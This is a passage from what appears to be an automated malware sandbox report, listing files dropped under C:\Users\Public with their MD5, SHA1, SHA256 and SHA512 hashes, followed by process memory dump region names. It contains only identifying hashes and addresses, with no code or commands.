| SHA512 | b11cec0f21dec871163d6c254850d3f807ecc4ae726b143a0c4667a25c3a3fe9283aee3f6850a2389fdce3d20f41d9c3d30f4768171137d6bdc1355a2116189c |
C:\Users\Public\Framework.dll
| MD5 | 6a08392ecf95df7fc91917dcfaae8da6 |
| SHA1 | 480f6a5c761e1a069c0d68f5ac2aabf727791393 |
| SHA256 | 0a572ee5508d9310936801a04237d56f118dff4dbaa98f60070988cc4b8ca460 |
| SHA512 | d70c436183a9c6f6d4ce9296dce846f94cd12d7fbb76b24e59d88a77349a95a7a0d6ad8f9f4ffc32a98618b3250e0d35e4cf9ff1e711f4e63ffee425597dfc5e |
C:\Users\Public\invoke.dll
| MD5 | b9376e9e3c4d48f5e35a3f355ae1f74a |
| SHA1 | c65605adf5270f5065089b0189da542274d30db0 |
| SHA256 | 90092e5fb861dd4ff34fa20f4b31ca44ebbb3bc367a8d7a35b89a7f89c793fa9 |
| SHA512 | 5560101edb289c4a86476bce55648324ef188ff1e2d879a1a3bc10c1298aa643255c35d16a984f30d624fe9a87306304eaa14179863001ddd6e264e8bba17591 |
C:\Users\Public\Execute.dll
| MD5 | 529cf04db0f736467c7583ea80c3aa66 |
| SHA1 | 7628148337b1d3d700c8151f76a1595b6f5123b8 |
| SHA256 | 67642e56281bc4aa846689bc725f8fcc76e61c20831aa4f7e2e0c8cdba17e520 |
| SHA512 | f612b12e1a7c2021f6c2723fe57f23aba3d1b6588f080dd67e48dc44eeaf88455e4bc6bf9caed088c63c3fb019ad8696eeb44e7bb09f8c81638779f4658ef6d4 |
memory/5068-107-0x000002286BC50000-0x000002286BCA2000-memory.dmp
memory/5068-108-0x0000022869390000-0x00000228693A0000-memory.dmp
memory/5068-109-0x0000022869390000-0x00000228693A0000-memory.dmp
memory/1612-110-0x0000000000400000-0x0000000000416000-memory.dmp
memory/5068-112-0x00007FFD05130000-0x00007FFD05BF1000-memory.dmp
memory/1612-113-0x00000000753C0000-0x0000000075B70000-memory.dmp
memory/1612-114-0x0000000004D80000-0x0000000004D90000-memory.dmp
memory/1612-115-0x0000000005540000-0x0000000005AE4000-memory.dmp
memory/1612-116-0x0000000005170000-0x0000000005202000-memory.dmp
memory/1612-117-0x0000000005150000-0x000000000515A000-memory.dmp
memory/1612-120-0x0000000006370000-0x000000000640C000-memory.dmp
memory/1612-121-0x0000000005E60000-0x0000000005EC6000-memory.dmp
memory/1612-122-0x00000000753C0000-0x0000000075B70000-memory.dmp
memory/1612-123-0x0000000004D80000-0x0000000004D90000-memory.dmp
memory/1448-124-0x00007FFD05130000-0x00007FFD05BF1000-memory.dmp
memory/1448-125-0x000001BE691A0000-0x000001BE691B0000-memory.dmp
memory/1448-126-0x000001BE691A0000-0x000001BE691B0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8a3a11baeb69c919d9e6a93ff4353155 |
| SHA1 | d926b5b919307fb37e39b94550c98922533e23e5 |
| SHA256 | 052ccf5c0687f85f7eb792a6425134ca99308252992cb59862bc063d100bac9c |
| SHA512 | c6f857e401490c2bbe5e6493e4834b89fa5b73909bf51c2c5aee8b26a456834cac32fe93a669646a8538cb1290673e875dfc2154bcf3a99117ef6bc6bfe3dda9 |
memory/1448-137-0x000001BE69BA0000-0x000001BE69BF2000-memory.dmp
memory/1448-138-0x000001BE691A0000-0x000001BE691B0000-memory.dmp
memory/1448-139-0x000001BE691A0000-0x000001BE691B0000-memory.dmp
memory/880-141-0x00000000753C0000-0x0000000075B70000-memory.dmp
memory/1448-144-0x00007FFD05130000-0x00007FFD05BF1000-memory.dmp
memory/880-145-0x0000000005640000-0x0000000005650000-memory.dmp
memory/880-147-0x00000000753C0000-0x0000000075B70000-memory.dmp